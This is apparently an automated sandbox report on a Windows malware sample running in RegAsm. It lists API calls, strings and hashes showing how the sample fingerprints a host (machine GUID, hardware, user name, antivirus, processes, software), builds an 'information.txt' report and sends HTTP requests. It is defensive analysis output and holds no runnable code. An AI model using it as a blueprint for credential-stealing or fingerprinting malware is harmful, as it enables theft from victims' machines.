                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062C8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062E1
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004062EA
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004062FD
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406311
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406328
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040637E
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406389
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405E9B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406396
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004063A0
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                                                                    • String ID: "$"$"$*$------$------$------$------$build_id$mode${A${A
                                                                                                                                                                                                                                                    • API String ID: 530647464-1741868562
                                                                                                                                                                                                                                                    • Opcode ID: a42581a42c37341c2c70c8d608a6b8d9b28554a4a70040449937b623cdf97783
                                                                                                                                                                                                                                                    • Instruction ID: 2abd88f26721da712bdd4eb8e4b5f156ee80a5ee9949695b18cf4aadc7b17cf9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a42581a42c37341c2c70c8d608a6b8d9b28554a4a70040449937b623cdf97783
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F525075801248EACB15EBE5C956BEEBBB85F14704F14407EE502735D2DA382B0CCBB9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004154D0 Relevance: 51.8, APIs: 2, Strings: 27, Instructions: 1035stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 844 4154d0-41630f call 40fcd0 call 40fe90 call 40fdb0 call 40fd50 call 402330 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410150 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410ae0 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410b80 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410be0 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 GetCurrentProcessId call 411880 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410d90 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410ee0 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 4110a0 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410110 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 4100d0 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410a60 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410220 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410150 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 4101b0 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410380 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410430 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 4103f0 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410530 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 4105a0 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 410950 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 4106b0 call 40fe00 call 40fdb0 call 40fd50 * 2 call 4106b0 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40ff70 lstrlenA call 40ff70 call 40fcd0 call 401060 call 415250 call 40fd50 * 5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: GetProcessHeap.KERNEL32(00000000,00000104,?,004271C4,00000000,?,00000000,00000000), ref: 0041015E
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: HeapAlloc.KERNEL32(00000000,?,004271C4,00000000,?,00000000,00000000), ref: 00410165
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: GetLocalTime.KERNEL32(004271C4,?,004271C4,00000000,?,00000000,00000000), ref: 00410171
                                                                                                                                                                                                                                                      • Part of subcall function 00410150: wsprintfA.USER32 ref: 0041019D
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: memset.MSVCRT ref: 00410B05
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B22
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B44
                                                                                                                                                                                                                                                      • Part of subcall function 00410AE0: CharToOemA.USER32(00000000,?), ref: 00410B62
                                                                                                                                                                                                                                                      • Part of subcall function 00410B80: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410B95
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C18
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetVolumeInformationA.KERNEL32(00421639,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C51
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410C9D
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: HeapAlloc.KERNEL32(00000000), ref: 00410CA4
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004271FC,00000000,?,00000000,00000000,00000000,00000000), ref: 0041580B
                                                                                                                                                                                                                                                      • Part of subcall function 00411880: OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041189C
                                                                                                                                                                                                                                                      • Part of subcall function 00411880: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118B7
                                                                                                                                                                                                                                                      • Part of subcall function 00411880: CloseHandle.KERNEL32(00000000), ref: 004118BE
                                                                                                                                                                                                                                                      • Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DA5
                                                                                                                                                                                                                                                      • Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410DAC
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?,00427208,00000000), ref: 00410F03
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220), ref: 00410F14
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000), ref: 00410F2E
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: CoSetProxyBlanket.OLE32(00427208,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000), ref: 00410F67
                                                                                                                                                                                                                                                      • Part of subcall function 00410EE0: VariantInit.OLEAUT32(?), ref: 00410FC6
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110C3
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244), ref: 004110D4
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110EE
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: CoSetProxyBlanket.OLE32(DrB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000), ref: 00411127
                                                                                                                                                                                                                                                      • Part of subcall function 004110A0: VariantInit.OLEAUT32(?), ref: 00411182
                                                                                                                                                                                                                                                      • Part of subcall function 00410110: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415A9E,00000000,?,Computer Name: ,00000000,?,00427250,00000000,?,00000000,00000000), ref: 0041011C
                                                                                                                                                                                                                                                      • Part of subcall function 00410110: HeapAlloc.KERNEL32(00000000,?,?,?,00415A9E,00000000,?,Computer Name: ,00000000,?,00427250,00000000,?,00000000,00000000,00000000), ref: 00410123
                                                                                                                                                                                                                                                      • Part of subcall function 00410110: GetComputerNameA.KERNEL32(00000000,00000000), ref: 00410137
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004180F2,004271B6), ref: 004100DC
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: HeapAlloc.KERNEL32(00000000,?,?,?,004180F2,004271B6), ref: 004100E3
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetUserNameA.ADVAPI32(00000000,004271B6), ref: 004100F7
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: CreateDCA.GDI32(015C2E20,00000000,00000000,00000000), ref: 00410A7A
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410A85
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410A90
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: ReleaseDC.USER32(00000000,00000000), ref: 00410A9B
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000), ref: 00410AA8
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000,?), ref: 00410AAF
                                                                                                                                                                                                                                                      • Part of subcall function 00410A60: wsprintfA.USER32 ref: 00410ABF
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: GetKeyboardLayoutList.USER32(00000000,00000000,00426EBF,?,?,00000001), ref: 00410267
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410279
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410284
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102B6
                                                                                                                                                                                                                                                      • Part of subcall function 00410220: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041035A
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101C1
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: HeapAlloc.KERNEL32(00000000), ref: 004101C8
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: GetTimeZoneInformation.KERNEL32(?), ref: 004101D7
                                                                                                                                                                                                                                                      • Part of subcall function 004101B0: wsprintfA.USER32 ref: 00410202
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410395
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: HeapAlloc.KERNEL32(00000000), ref: 0041039C
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: RegOpenKeyExA.KERNEL32(80000002,015CB3D8,00000000,00020119,00000000), ref: 004103BB
                                                                                                                                                                                                                                                      • Part of subcall function 00410380: RegQueryValueExA.KERNEL32(00000000,015D17E8,00000000,00000000,00000000,000000FF), ref: 004103D6
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410452
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: GetLastError.KERNEL32(?,?,00000001), ref: 00410460
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410498
                                                                                                                                                                                                                                                      • Part of subcall function 00410430: wsprintfA.USER32 ref: 004104E2
                                                                                                                                                                                                                                                      • Part of subcall function 004103F0: GetSystemInfo.KERNEL32(00000000), ref: 004103FD
                                                                                                                                                                                                                                                      • Part of subcall function 004103F0: wsprintfA.USER32 ref: 00410413
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC), ref: 0041053E
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC,00000000), ref: 00410545
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410565
                                                                                                                                                                                                                                                      • Part of subcall function 00410530: wsprintfA.USER32 ref: 0041058B
                                                                                                                                                                                                                                                      • Part of subcall function 004105A0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004105F7
                                                                                                                                                                                                                                                      • Part of subcall function 004105A0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00410684
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041099F
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: Process32First.KERNEL32(00000000,00000128), ref: 004109AF
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: Process32Next.KERNEL32(00000000,00000128), ref: 004109C1
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: Process32Next.KERNEL32(00000000,00000128), ref: 00410A2E
                                                                                                                                                                                                                                                      • Part of subcall function 00410950: CloseHandle.KERNEL32(00000000), ref: 00410A39
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegOpenKeyExA.KERNEL32(00000000,015C66D8,00000000,00020019,00000000,00426ED7,?,00000001), ref: 0041070F
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegEnumKeyExA.KERNEL32(00000000,?,?,8sB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041076E
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: wsprintfA.USER32 ref: 00410797
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107B5
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegQueryValueExA.KERNEL32(?,015D1FD0,00000000,000F003F,?,00000400), ref: 004107E5
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: lstrlenA.KERNEL32(?), ref: 004107FA
                                                                                                                                                                                                                                                      • Part of subcall function 004106B0: RegQueryValueExA.KERNEL32(?,015D2090,00000000,000F003F,?,00000400,00000000,004215C1,?,00000000,?,00426F08), ref: 0041087E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00427348,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416277
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$]|AU$information.txt
                                                                                                                                                                                                                                                    • API String ID: 1864629043-1551863989
                                                                                                                                                                                                                                                    • Opcode ID: 7eff1dcb814b99c68a84147ff3873a1869c82fe41fa7f405250466f0f98d7d50
                                                                                                                                                                                                                                                    • Instruction ID: d7993859b9aedb12a70ce0967869d7c0769366a874244706f063db3116ab8e56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eff1dcb814b99c68a84147ff3873a1869c82fe41fa7f405250466f0f98d7d50
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08926D75C05249E9CB15EBE1C956AEEBB785F24304F5041BEE602335D2DE382B4CCAB9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040CDF0 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 312stringmemoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040CEA9
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040CF06
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040CF0D
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040CFBA
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8A0), ref: 0040CFD4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040CFE7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426888), ref: 0040CFF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D009
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,0042688C), ref: 0040D018
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8C0), ref: 0040D029
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D03C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426890), ref: 0040D04B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF7A0), ref: 0040D05B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D06E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426894), ref: 0040D07D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015D1E38), ref: 0040D08E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D0A1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426898), ref: 0040D0B0
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,0042689C), ref: 0040D0BF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 0040D0F7
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D149
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D179
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
